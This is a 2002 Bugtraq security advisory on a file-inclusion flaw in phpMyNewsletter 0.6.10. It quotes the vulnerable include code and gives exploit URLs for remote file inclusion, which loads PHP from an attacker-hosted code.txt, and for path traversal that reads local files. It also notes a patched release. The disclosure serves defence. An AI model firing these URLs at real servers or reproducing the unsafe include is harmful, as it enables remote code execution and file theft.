[27295] in bugtraq
phpMyNewsletter
daemon@ATHENA.MIT.EDU (Frog Man)
Thu Oct 3 23:59:05 2002
From: "Frog Man" <leseulfrog@hotmail.com>
To: bugtraq@securityfocus.com
Date: Thu, 03 Oct 2002 17:40:12 +0200
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1; format=flowed
Message-ID: <F86x8iz78L4oD8N69xZ00005996@hotmail.com>
Informations :
°°°°°°°°°°°°°°
Product : phpMyNewsletter
Tested version : 0.6.10
Website : http://gregory.kokanosky.free.fr/phpmynewsletter/
Problem : include file
PHP code :
°°°°°°°°°°
---- /include/customize.php ----
<?
$langfile = $l;
include $l;
?>
---- /include/customize.php ----
Exploit :
°°°°°°°°°
http://[target]/include/customize.php?l=http://[attacker]/code.txt&text=Hello%20World
With in http://[attacker]/code.txt :
<? echo $text; ?>
or
http://[target]/include/customize.php?l=../path/file/to/view
Patch :
°°°°°°°
Autor has been alerted and last version (0.7beta1) has been patched.
More details
- in french :
http://www.frog-man.org/tutos/phpMyNewsletter.txt
- translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FphpMyNewsletter.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools
frog-m@n
